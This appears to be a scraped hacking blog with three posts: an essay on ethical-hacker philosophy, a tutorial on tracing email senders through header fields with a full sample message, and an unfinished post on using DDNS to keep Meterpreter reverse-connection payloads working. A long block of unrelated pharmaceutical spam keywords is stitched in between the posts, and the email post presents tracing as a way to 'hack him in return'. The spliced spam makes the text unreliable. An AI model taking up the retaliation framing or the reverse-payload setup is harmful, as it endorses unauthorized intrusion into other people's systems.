Ethical Hacking and The Hacker Culture

Nowadays most of us have heard the term Ethical Hacker due to ‘hacktivist’ groups like Anonymous gaining popularity in the media. But what exactly is Ethical Hacking? We have a general idea that it means hacking without any malicious intent, or more simply the kind of hacking the ‘good guys’ do. But if we delve deeper, it means more than that, it represents a philosophy and morality popular among the hacker and hacktivist communities.

Definition

Formally Ethical Hacking may be defined as the practice of systematically attempting to break into or penetrate for the purpose of locating weaknesses and vulnerabilities of the computer system by duplicating the actions of malicious black-hat hackers. Actually, what I just said defines Penetration Testing, to be precise ‘Ethical Hacking’ is a term coined by IBM meant to imply a broader category than just penetration testing. Ethical hackers do this ‘penetration testing’ on the request of or by being employed by the owner of the computer system so that he can fix these weaknesses and make the system more secure.

Philosophy

Ethical hackers generally follow a set of moral values and philosophy. They promote sharing of knowledge, they believe that all information should be free. They also believe bureaucracies such as corporates are flawed systems, they promote decentralization so that may lead to freedom of information exchange. They say that hackers shouldn’t be judged by their age, race, or qualifications, they should only by judged by their hacking skill. A common value of community and collaboration is also present among the hackers.

I should emphasize that being an ethical hacker doesn’t necessarily mean having these qualities and following these moral values and philosophies. Hacker ethics are separate from just being a hacker. But these ethics are very popular among the general hacking community and so it may be considered as a trait of the community, maybe not of an individual hacker.

Before concluding I would like to share a small essay written by a hacker by the name (rather pseudo name) of ‘The Mentor’ shortly after being arrested. It’s called ‘The Hacker Manifesto’, and is considered one of the cornerstone of the hacker culture. You can find it here – http://www.phrack.org/issues/7/3.html

Email | Structure and How to Trace it

We all have received fake spam mail telling us that we’ve won million dollars at some point in our life. Maybe one day you receive a threatening email or a simple phishing mail, and you want to find out who did it so that you can hack him in return. To do that you need to know the IP address of the mail server sending the email. In this article I’m gonna show you how to do that, after introducing you to the basics of the structure of an Internet Message or simply, Email.

Email is one of oldest mode of communication through a computer network (usually the Internet) which is still popular today. The Email which we are familiar with was standardized and came into popular usage in the early 1970s, and it has been a core foundation of the Internet since then. Nowadays we all use a fancy web interface or mobile app to send and view received emails, so we don’t have to worry about how is it working. But that isn’t enough for a hacker, is it? If we don’t know the detailed intricacies of its mechanism, how can we exploit it or do something advanced with it? So, keep reading!

The Internet Message Format

The current Email format is defined in RFC 5322. Multimedia Email attachments’ format is defined in RFC 2045 through RFC 2049, and this format is called Multimedia Internet Mail Extensions or simply MIME. You can read those RFC articles to get a fully detailed formal documentation of the structure and format of email, but it’s not necessary as I will discuss it in short here. Nevertheless, if you are interested to learn more, you can check them out after reading this post of mine.

At the most basic level, an email is a series of ASCII characters. It consists of line of characters, lines ending with ASCII ‘CRLF’ (carriage return and line feed). The entire email can be divided into two parts, the Header section and the Body. Let’s see an example email to get an idea of what we are talking about.

Delivered-To: john.doe@gmail.com
Received: by 10.200.55.226 with SMTP id e31csp1128773qtc;
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by 10.107.131.213 with SMTP id n82mr2118112ioi.125.1476809419401;
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Return-Path: 
Received: from o6.em.email.accounts.autodesk.com (o6.em.email.accounts.autodesk.com. [167.89.4.107])
by mx.google.com with ESMTPS id g126si21395826ioa.252.2016.10.18.09.50.19
for 
(version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received-SPF: pass (google.com: domain of bounces+1621835-f4d2-john.doe=gmail.com@em.email.accounts.autodesk.com designates 167.89.4.107 as permitted sender) client-ip=167.89.4.107;
Authentication-Results: mx.google.com;
dkim=pass header.i=@email.accounts.autodesk.com;
dkim=pass header.i=@sendgrid.info;
spf=pass (google.com: domain of bounces+1621835-f4d2-john.doe=gmail.com@em.email.accounts.autodesk.com designates 167.89.4.107 as permitted sender) smtp.mailfrom=bounces+1621835-f4d2-john.doe=gmail.com@em.email.accounts.autodesk.com
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=email.accounts.autodesk.com; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=I8q38u7TFdqinW6Y02 AM+ifHWAvTihYfBs5GSZl8JDnuc1BlMffeS8KUkWyRJjLY+B0ch4uPXBvCHdCZ75 VGkMp0jmmQRyVzQ4hfvAeTYVJ0fDzB89cHKyTzLTpd/ak9D0OAcc+6TJFqCgURMH CSrAzDL/ejxBTOEgepL8Y3Feg=
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=sendgrid.info; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding:x-feedback-id; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=YK6zoBmBYxE2GRUFIh Qze6EJGuxLw1UtO+NGfdmUgSmtNVLUt8p/N+CS9nPNONFESaVo2Ebk0iV8OBXqs0 EhPaOVOIiAcnSI/fwzd8A/dN+y3gqNquU3ysc9Gyk3kDcFSI8nj9yC4uhAs4fpMv AC/2kWdHjFjHBiTRYcL07C46M=
Received: by filter0958p1mdw1.sendgrid.net with SMTP id filter0958p1mdw1.2775.580652C7AF
2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 (ec2-52-4-196-162.compute-1.amazonaws.com [52.4.196.162]) by ismtpd0006p1iad1.sendgrid.net (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)
MIME-Version: 1.0
From: Autodesk 
To: john.doe@gmail.com
Reply-To: noreply@mail.accounts.autodesk.com
Date: 18 Oct 2016 16:50:15 +0000
Subject: Verify your Autodesk account
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: base64
Message-ID: 
X-SG-EID: iimKsBOu00eJI3OJPONMulw6aZ/yjiemm1SqdEDLcTZBP1eHyN3Qr32i1Vdhd5J7BwflVrWhRCLr0j woo/OKUHaIA1bGmnv8Qd2DfN0OSocqGDQ8DK7afms0hcjbrNUG/S3Bsv7fJWCR15UEaoJ/qfJtpdgG gZSAdl3d07GxUEWB0KHMNBmsfHLUEhfyzWPfn5IBYcQ334wRxcWBQ/eu31XQd8fIXETIiBgrd19ic6 SiLuZKRyxs7mVzCv46+9G/
X-Feedback-ID: 1621835:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SG

PGh0bWw+DQo8aGVhZD4NCjxsaW5rIGhyZWY9Imh0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9j
c3M/ZmFtaWx5PU9wZW4rU2Fuczo0MDAsMzAwLDcwMCIgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0
ZXh0L2NzcyIgLz4NCjxzdHlsZT4NCiAgICAgICBAaW1wb3J0IHVybChodHRwOi8vZm9udHMuZ29v
Z2xlYXBpcy5jb20vY3NzP2ZhbWlseT1PcGVuK1NhbnM6NDAwLDMwMCw3MDApOw0KCSAgIFtzdHls
ZSo9Ik9wZW4gU2FucyJdIHsNCiAgICBmb250LWZhbWlseTogJ09wZW4gU2FucycsIEFyaWFsLCBz
YW5zLXNlcmlmICFpbXBvcnRhbnQNCn0NCg0KYXsNCnRleHQtZGVjb3JhdGlvbjpub25lICFpbXBv
cnRhbnQ7DQpjb2xvcjojMDY5NkQ3ICFpbXBvcnRhbnQ7DQp9DQphOmhvdmVyew0KdGV4dC1kZWNv
cmF0aW9uOnVuZGVybGluZSAhaW1wb3J0YW50Ow0KDQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KICA8
Ym9keSBzdHlsZT0icGFkZGluZzozMnB4IDEwJTsgbWFyZ2luOjBweDsgZm9udC1mYW1pbHk6J09w
ZW4gU2FucycsICdIZWx2ZXRpY2EgTmV1ZScsIEhlbHZldGljYSxBcmlhbCwgU2Fucy1TZXJpZjtj
b2xvcjogIzMzMzsgYmFja2dyb3VuZC1jb2xvcjogI0ZGRkZGRjsiPg0KICAgIDx0YWJsZSAgc3R5
bGU9ImJvcmRlcjoxcHggc29saWQgI2NjYzsiICA+DQogICAgICAgPHRyICA+DQogICAgICAgICA8
dGQgc3R5bGU9InBhZGRpbmc6MHB4O21hcmdpbjozMnB4O21hcmdpbi1ib3R0b206MHB4OyIgYWxp
Z249ImxlZnQiPg0KICAgICAgICAgICAgPGltZyBzdHlsZT0ibWFyZ2luOjMycHg7bWFyZ2luLWJv
dHRvbTowcHgiIHNyYz0iaHR0cHM6Ly9hcGkuYXV0b2Rlc2suY29tL2NvbnRlbnQvaWRlbnRpdHkv
MS4wLjIxMTguMzg4MTU5LjEwMjMvei9Db250ZW50L2ltYWdlcy9sYXlvdXQvYXV0b2Rlc2stZW1h
aWwtbG9nby5wbmciIGFsdD0iQXV0b2Rlc2siLz4NCiAgICAgICAgIDwvdGQ+DQogICAgICA8L3Ry
Pg0KICAgICAgPHRyID4NCiAgICAgICAgPHRkIHN0eWxlPSJwYWRkaW5nOjMycHg7Ij4NCiAgICAg
ICAgICA8dGFibGUgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiIHdp
ZHRoPSIxMDAlIiBzdHlsZT0id2lkdGg6IDEwMCU7Ij4NCiAgICAgICAgICAgIDx0ciBzdHlsZT0i
bWFyZ2luOjMycHg7bWFyZ2luLWxlZnQ6MHB4Ij4NCiAgICAgICAgICAgICAgPHRkPg0KCQkJICAg
IDx0YWJsZSBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCIgc3R5bGU9
ImZvbnQtZmFtaWx5OiAnT3BlbiBTYW5zJywnSGVsdmV0aWNhIE5ldWUnLCBIZWx2ZXRpY2EsQXJp
YWwsIFNhbnMtU2VyaWYiPg0KCQkJCSAgICA8dHI+DQoJCQkJCSAgICA8dGQgIHN0eWxlPSJmb250
LWZhbWlseTogJ09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVsdmV0aWNhLEFyaWFsLCBT
YW5zLVNlcmlmIj4NCgkJCQkgICAgICAgICAgICA8cCBzdHlsZT0iZm9udC1zaXplOiAyMnB4O21h
cmdpbjowcHg7cGFkZGluZzowcHg7Zm9udC13ZWlnaHQ6NDAwIj4NCgkJCQkgICAgICAgICAgICAg
SGkgU3VtaXQgR2hvc2gsDQoJCQkJICAgICAgICAgICAgPC9wPg0KCQkJCSAgICAgICAgICAgIDxw
IHN0eWxlPSJmb250LXNpemU6IDE0cHg7bWFyZ2luOjBweDtwYWRkaW5nOjBweDttYXJnaW4tdG9w
OjE2cHg7Zm9udC1mYW1pbHk6J09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVsdmV0aWNh
LGFyaWFsO2ZvbnQtd2VpZ2h0OjQwMDtsaW5lLWhlaWdodDoxLjYiPg0KCQkJCQkgICAgICAgICAg
IFdlbGNvbWUgdG8gQXV0b2Rlc2shDQoJCQkJICAgICAgICAgICAgPC9wPg0KCQkJCQkJCSA8cCBz
dHlsZT0iZm9udC1zaXplOiAxNHB4O2NvbG9yOiMzMzM7dGV4dC1kZWNvcmF0aW9uOm5vbmU7cGFk
ZGluZzowcHg7bWFyZ2luOjBweDtmb250LWZhbWlseTonT3BlbiBTYW5zJywnSGVsdmV0aWNhIE5l
dWUnLCBIZWx2ZXRpY2EsYXJpYWw7Zm9udC13ZWlnaHQ6NDAwO2xpbmUtaGVpZ2h0OjEuNiI+DQoJ
CQkJCSAgICAgICAgICAgUGxlYXNlIGNvbXBsZXRlIHlvdXIgYWNjb3VudCBieSB2ZXJpZnlpbmcg
eW91ciBlbWFpbCBhZGRyZXNzLg0KCQkJCSAgICAgICAgICAgIDwvcD4NCgkJCQkgICAgICAgICAg
ICA8cCA+DQoJCQkJCQkJICA8IS0tW2lmIG1zb10+DQoJCQkJCQkJICAgIDxwIHN0eWxlPSJtYXJn
aW4tdG9wOjE2cHg7bWFyZ2luLWJvdHRvbTozMnB4OyI+DQogICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgIDx2OnJvdW5kcmVjdCB4bWxuczp2PSJ1cm46c2NoZW1hcy1taWNyb3NvZnQt
Y29tOnZtbCIgeG1sbnM6dz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTpvZmZpY2U6d29yZCIg
aHJlZj0iaHR0cHM6Ly9hY2NvdW50cy5hdXRvZGVzay5jb206NDQzL3VzZXIvdmVyaWZ5ZW1haWwv
MzlkYzYwNjhiYTgwMzc2ZTVhY2ZhN2NiOWE3ZDUwZDM3MTM3NGMyMz9yZWZlcnJlcj1odHRwJTNB
JTJGJTJGd3d3LmF1dG9kZXNrLmNvbSUyRmVkdWNhdGlvbiUyRmZyZWUtc29mdHdhcmUlMkZpbnZl
bnRvci1wcm9mZXNzaW9uYWwmcHJvZHVjdG5hbWU9ZG90Y29tJnVpdHlwZT1lZHVjYXRpb24iIHN0
eWxlPSJoZWlnaHQ6NTBweDt3aWR0aDogMjAwcHg7di10ZXh0LWFuY2hvcjptaWRkbGU7d2lkdGg6
YXV0bzt0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOyIgYXJjc2l6ZT0iMCUiICBzdHJva2U9ImYi
IGZpbGxjb2xvcj0iIzA2OTZENyI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICA8dzphbmNob3Jsb2NrLz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8
Y2VudGVyIHN0eWxlPSJjb2xvcjojZmZmZmZmO2ZvbnQtZmFtaWx5OidPcGVuIFNhbnMnLCdIZWx2
ZXRpY2EgTmV1ZScsIEhlbHZldGljYSxhcmlhbDtmb250LXNpemU6MTlweCI+DQogICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWRVJJRlkgRU1BSUwNCiAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgPC9jZW50ZXI+DQogICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgIDwvdjpyb3VuZHJlY3Q+DQoJCQkJCQkJCSAgIDwvcD4NCiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgPCFbZW5kaWZdLS0+DQogICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIDwhW2lmICFtc29dPg0KCQkJCQkJCSAgICAgPHRhYmxlIGJvcmRlcj0iMCIgc3R5bGU9Im1h
cmdpbi10b3A6MzJweDttYXJnaW4tYm90dG9tOjQ4cHg7d2lkdGg6IDEwMCU7IiBjZWxsc3BhY2lu
Zz0iMCIgY2VsbHBhZGRpbmc9IjAiIHdpZHRoPSIxMDAlIiA+DQogICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICA8dHIgPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgPHRkID4NCgkJCQkJCQkgICAgICAgICAgPHRhYmxlIGFsaWduPSJsZWZ0IiBzdHlsZT0idGV4
dC1hbGlnbjogY2VudGVyO3ZlcnRpY2FsLWFsaWduOmNlbnRlcjsgY29sb3I6ICNmZmY7IGRpc3Bs
YXk6IGJsb2NrOyI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+DQog
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+DQogICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgPGEgc3R5bGU9ImNvbG9yOiNmZmYgIWltcG9ydGFudDtwYWRkaW5n
OiAxNnB4O2hlaWdodDo1MHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiMwNjk2RDc7Zm9udC1zaXplOjE5
cHg7dGV4dC1kZWNvcmF0aW9uOm5vbmU7dGV4dC10cmFuc2Zvcm06IHVwcGVyY2FzZTtmb250LWZh
bWlseTogJ09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVsdmV0aWNhLEFyaWFsLCBTYW5z
LVNlcmlmIiBocmVmPSJodHRwczovL2FjY291bnRzLmF1dG9kZXNrLmNvbTo0NDMvdXNlci92ZXJp
ZnllbWFpbC8zOWRjNjA2OGJhODAzNzZlNWFjZmE3Y2I5YTdkNTBkMzcxMzc0YzIzP3JlZmVycmVy
PWh0dHAlM0ElMkYlMkZ3d3cuYXV0b2Rlc2suY29tJTJGZWR1Y2F0aW9uJTJGZnJlZS1zb2Z0d2Fy
ZSUyRmludmVudG9yLXByb2Zlc3Npb25hbCZwcm9kdWN0bmFtZT1kb3Rjb20mdWl0eXBlPWVkdWNh
dGlvbiI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWRVJJRlkgRU1B
SUwNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvYT4NCiAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
IDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KCQkJCQkJCSAg
ICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAg
ICA8IVtlbmRpZl0+DQoJCQkJCQkgICA8L3A+DQoJCQkJICAgICAgICAgICANCgkJCQkgICAgICAg
ICAgICA8cCBzdHlsZT0id29yZC13cmFwOmJyZWFrLXdvcmQ7IGRpc3BsYXk6IGJsb2NrO2ZvbnQt
c2l6ZTogMTJweDtmb250LWZhbWlseTogJ09wZW4gU2FucycsJ0hlbHZldGljYSBOZXVlJywgSGVs
dmV0aWNhLEFyaWFsLCBTYW5zLVNlcmlmO2ZvbnQtd2VpZ2h0OjQwMDtsaW5lLWhlaWdodDoxLjYi
Pg0KCQkJCQkgICAgICAgICAgICBJZiB0aGUgbGluayBhYm92ZSBkb2Vzbid0IHdvcmssIHlvdSBj
YW4gY29weSBhbmQgcGFzdGUgdGhlIGZvbGxvd2luZyBpbnRvIHlvdXIgYnJvd3Nlcjo8YnIvPg0K
CQkJCQkgICAgICAgICAgICBodHRwczovL2FjY291bnRzLmF1dG9kZXNrLmNvbTo0NDMvdXNlci92
ZXJpZnllbWFpbC8zOWRjNjA2OGJhODAzNzZlNWFjZmE3Y2I5YTdkNTBkMzcxMzc0YzIzP3JlZmVy
cmVyPWh0dHAlM0ElMkYlMkZ3d3cuYXV0b2Rlc2suY29tJTJGZWR1Y2F0aW9uJTJGZnJlZS1zb2Z0
d2FyZSUyRmludmVudG9yLXByb2Zlc3Npb25hbCZwcm9kdWN0bmFtZT1kb3Rjb20mdWl0eXBlPWVk
dWNhdGlvbg0KCQkJCSAgICAgICAgICAgIDwvcD4NCiAgICAJCQkgICAgICAgIDwvdGQ+DQogICAg
ICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAg
ICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICA8L3RyPg0KICAgICAgICAgIDwvdGFibGU+DQog
ICAgICAgIDwvdGQ+DQoJPC90cj4NCiAgICA8L3RhYmxlPg0KCTx0YWJsZT4NCgk8dHI+DQogICAg
ICAgIDx0ZCBzdHlsZT0iY29sb3I6ICM5OTk7IGZvbnQtc2l6ZTogMTJweDsgZm9udC1mYW1pbHk6
J09wZW4gU2FucycsICdIZWx2ZXRpY2EgTmV1ZScsIEhlbHZldGljYSxBcmlhbCwgU2Fucy1TZXJp
Zjtmb250LXdlaWdodDo0MDA7bGluZS1oZWlnaHQ6MS42Ij4NCiAgICAgICAgPHAgc3R5bGU9Im1h
cmdpbi10b3A6IDE2cHg7IHBhZGRpbmctdG9wOiAwO21hcmdpbi1ib3R0b206MHB4Ij4NCiAgICAg
ICAgICAgICAgQXV0b2Rlc2sgcmVzcGVjdHMgeW91ciBwcml2YWN5LiAgRm9yIG1vcmUgaW5mb3Jt
YXRpb24sIHBsZWFzZSByZXZpZXcgb3VyIDxhIGhyZWY9Imh0dHA6Ly91c2EuYXV0b2Rlc2suY29t
L3ByaXZhY3kvIj5Qcml2YWN5IFBvbGljeTwvYT4uDQogICAgICAgPC9wPg0KCSAgIDxwICBzdHls
ZT0ibWFyZ2luLXRvcDogMDttYXJnaW4tYm90dG9tOiAwOyBwYWRkaW5nLXRvcDogMDtjb2xvcjog
Izk5OTsgZm9udC1zaXplOiAxMnB4OyBmb250LWZhbWlseTonT3BlbiBTYW5zJywgJ0hlbHZldGlj
YSBOZXVlJywgSGVsdmV0aWNhLEFyaWFsLCBTYW5zLVNlcmlmO2ZvbnQtd2VpZ2h0OjQwMDtsaW5l
LWhlaWdodDoxLjYiPg0KCSAgICA8cCBzdHlsZT0icGFkZGluZzogMDsgbWFyZ2luOiAwOyI+DQog
ICZjb3B5OyBDb3B5cmlnaHQgMjAxNiBBdXRvZGVzaywgSW5jLiBBbGwgcmlnaHRzIHJlc2VydmVk
Lg0KPC9wPgkgICA8L3A+DQogICAgICAgIDwvdGQ+DQogICAgICA8L3RyPg0KCTwvdGFibGU+DQog
IDwvYm9keT4NCjwvaHRtbD4=

The part before the first empty line is the header of this email, and after that the rest is body. Here you can see that the body part looks like some incomprehensible garbage, that’s because it is a MIME message, and the garbage part is actually HTML data encoded by Base64 encoding. You can decode it using any of the Base64 decoder found online and get the HTML data. Anyway, we are going to focus on the header part, because all other critical information resides in there, the body part contains just the message.

We can see the header part consists of header fields, each header field consisting of a field name and field value separated by a colon ‘:’.  for example a header field of this email is

Delivered-To: john.doe@gmail.com

Where ‘Delivered-To’ is the field name and ‘john.doe@gmail.com’ is the field value. Just to be clear, I replaced my original email ID with ‘john.doe@gmail.com’ here.

The header section can contain any number of information in this format, there is no restriction. So there can be different header fields in various emails. But there are certain fields that are mandatory, and those contain the information we need to trace the mail. You can read about various email header fields here on Wikipedia.

Tracing an Email

Now that we know the basics of the Internet Message Format, it’s time we dive into the fun stuff, tracing the email. For that, we need to concentrate on the Trace fields, so to speak. They contain the information needed to trace it, obviously. The trace fields are:

  • Received
  • Return-Path
  • Authentication-Results
  • Received-SPF
  • Auto-Submitted
  • VBR-Info

Among these, the Received field is the most important and most reliable. When an SMTP server receives a message it inserts this header at the top of the message. And as most emails go through several SMTP servers in the journey from the sender to receiver, it contains several Received fields, each one inserted by different SMTP servers. In the example email the Received fields are:

Received: by 10.200.55.226 with SMTP id e31csp1128773qtc;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by 10.107.131.213 with SMTP id n82mr2118112ioi.125.1476809419401;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: from o6.em.email.accounts.autodesk.com (o6.em.email.accounts.autodesk.com. [167.89.4.107])
        by mx.google.com with ESMTPS id g126si21395826ioa.252.2016.10.18.09.50.19
        for 
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: by filter0958p1mdw1.sendgrid.net with SMTP id filter0958p1mdw1.2775.580652C7AF
        2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 (ec2-52-4-196-162.compute-1.amazonaws.com [52.4.196.162]) by ismtpd0006p1iad1.sendgrid.net (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)

As SMTP servers insert the Received field at the top of the email when they receive it, if we read them from top to bottom we can trace the path through the email has travelled. The field value of the Received header field generally contains the host name or IP address of itself and the host name or IP of the server from which it received the mail.

Another thing to note here, I’ve also listed the X-Received header field. Any field starting with X is a non-standard header and it cannot be trusted. It’s used by mail servers for their own benefit, generally a servers won’t trust X headers inserted by any other server. Anyway, I’ve still included this because it may give us some additional information, keeping in mind that it is not very reliable. So from the Received (and X-Received) fields of the example mail, we can trace the route of the mail, and it would look like this

  • ec2-52-4-196-162.compute-1.amazonaws.com [52.4.196.162]
  • ismtpd0006p1iad1.sendgrid.net
  • filter0958p1mdw1.sendgrid.net
  • o6.em.email.accounts.autodesk.com
  • mx.google.com
  • 10.107.131.213
  • 10.200.55.226

The email went through these servers in this order. So the mail server that actually sent the email is the first one, and if you were after that one for reasons, you can focus on that.

Automating the Tracing of an Email

Although it’s good or maybe essential for a hacker to know how to manually trace an email, you don’t have to do it every time. There are many tools in the Internet that automate this process. You just have to paste the email header in those tools and they will trace the route of it. Just search email header analyser in Google and you’ll get a lot of tools like this. There’s one made by Google itself, you can get it here. Happy hacking!

cheap viagra amoxicillian cialis 20 mg viagra cialis natural viagra alternatives that work amoxicillin rash axoloti cialis on line viagra government funded cialis vs viagra viagra pills amoxicillin 500mg capsules generic viagra 100mg cialis 10 mg viagra canada amoxicillin 500 mg for sinus infection cialis viagra cost axolotyl is viagra government funded revatio vs viagra buy viagra amoxicillin side effects in men amoxicillin tablets amovil viagra 100mg tablets retail price viagra coupons viagra patent expiration viagra from canada viagra dosage cialis generic tadalafil axolotl amoxil 500 mg cilias amoxicilina amoxycillin viamedic cialis utilisation viagra augmentin 875-125 amox-clav 875-125 mg tablet xolotl is viagra federally funded cialis 5 mg levitra vs viagra where to buy viagra amoxicillin for cats cialis canada buy viagra online axoltl free viagra cialis copay card what is amoxicillin used for amoxicillin 500 mg and alcohol side effects of cialis viagra for women viagra side effects female viagra cialis for men viagra government funding cialis price cialis medication viagra ingredients cialis professional cialis effects cialis testimonials amoxicillin medscape cialis tadalafil pfizer viagra viagra generic when will cialis go generic viagra without a doctor prescription generic cialis tadalafil cialis coupon 20 mg viagra alternatives cialis coupon cialis side effects amoxicillin 875 mg canadian viagra wholesale cialis trial viagra sample cialis sample cyalis viagra coupons 75 off amoxicillin generic for cialis cialis otc viagra girls amoxidal how does cialis work mexican salamander viagra pill amox/k clav 875-125 amoxcillin cialis alternative cialis free trial discount cialis cialis coupons 2017 how to take cialis viagra costs cialis from canada cialis savings card discount viagra cost of viagra cialis for women price cialis cealis cialis or viagra cialis patent expiration 2017 is viagra covered by insurance cialis pharmacy prices amoxicillin 250mg cvs pharmacy viagra coupons cialis generic cialis dosage amox-clav 875-125 mexican walking fish viagra dose walgreens viagra substitute is viagra government funded in america erectile dysfunction cialis dosage of amoxicillin amoxicillin uses amox-clav 875-125 mg viagra from amazon online cialis cialis 30 day trial coupon amoxicillin 500 mg viagra single packs inexpensive viagra pills viagra pills for sale sex viagra for women amoxi cialis for daily use cialis canadian pharmacy viagra coupons from pfizer amoxicilin side effects of amoxicillin amoxicillin/clavulanic acid amoxicillin and clavulanate potassium 875 125 cialis pills for sale axolotls amoxicillin 500mg augmentin 500 cialis samples overnight viagra single packs cost cialis patent expiration viagra porn viagra online amox clav 875 cialis dosage strengths viagra substitute axlotl amoxicillan cialis voucher how long does viagra last what is cialis cialis daily viagra best price canadian cialis sildenafil vs viagra cialis coupons non prescribed viagra viagra otc viagra viagra 100mg price walmart cialis for bph cialis 20mg directions liquid cialis amoxicillin dosing pfizer viagra coupons viagra vs cialis natural viagra cialis 20mg amox clav 875-125 viagra vs cialis amoxicillin 500 augmentin drug class amoxicillin side effects best price viagra amoxacilin what is viagra cialis pills amoxillin trimox tamoxifen side effect of amoxicillin amoxil cialas amoxin cialis for sale how does viagra work cialis discount herbal viagra how much does cialis cost cialis 5mg daily cialis online stendra vs viagra healthy man viagra cialis samples online viagra amoxicillin uti daily cialis cialis coupon print viagra prices lowest cialis prices cialis vs viagra amoxicillin dosage sophia viagra cialis 5mg free cialis cialis coupons from manufacturer cialis reviews anadrol cialis or viagra cialis 30 day sample side effects of viagra viagra without prescription viagra price buy cialis online viagra sex side effects of amoxicillin 500 mg generic viagra available in usa what is amoxicillin viagra samples cialis website cialis cost cialis without a doctor’s prescription generic cialis buy cialis cialis trial cialis coupons printable cialis prices female viagra pills amoxicillin side effects in women cialis dosage recommendations is viagra funded by government viagra activate viagra on line no prec viagra without a doctor prescription usa what does viagra do how much does viagra cost generic viagra canada viagra cialis cheap axolot viagra pharmacy order online viagra 200 cialis coupon viagra savings offer viagra vs cialis vs levitra what is anoxia over the counter viagra women viagra does viagra work amoxicillin trihydrate 500mg augmentin dosage moxil amoxil dosage generic for viagra cost of cialis viagra coupon cheap cialis viagra prices without insurance viagra on line amox viagra for sale cialis pricing cialis patent expiration date extended canada cialis amoxicillin clavulanate does the government fund viagra cialis generic availability generic cialis at walmart

Use DDNS to Deal with Your Dynamic Public IP

Many of us have an internet connection with dynamic public IP. That poses some problems if you want to use that connection to host a website, or maybe for hackers like us, to hack using reverse connection payloads. I’m going to discuss in this post how you can overcome that using Dynamic DNS or DDNS. But I’m getting ahead of myself, so let me start by explaining what is public IP and what are some problems you can encounter if you have a dynamic one.

Understanding Dynamic Public IP Address

Public IP is the IP that’s visible to machines outside your local network. For example if two or more machines are connected through a router (maybe through WiFi) to the internet, then the machines are in a local network, as well as both of them are connected to the Internet. Each of them has a locally unique private IP address, not globally. For connecting to the Internet they use the router’s public IP.

IP addresses can be static or dynamic. Most of the ISPs provide dynamic public IP, that means it changes from time to time, contrary to the static one, which remains fixed. You can check what’s your public IP by googling ‘What is my IP’, Google will tell you.

Having a dynamic IP address is a hindrance to hacking using reverse connection payloads. Reverse connection payloads, such as android/meterpreter/reverse_tcp, store the host IP address, i.e. the IP address of the attacker machine. When it gets executed, it connects back to the host machine by the reference of that host IP. But as dynamic IP keeps changing from time to time, you won’t be able to use a payload for a long time because  after some time the IP stored inside it won’t point to your machine anymore. That’s a problem. A major one. This is where DDNS comes in.

Dynamic DNS aka DDNS to the Rescue

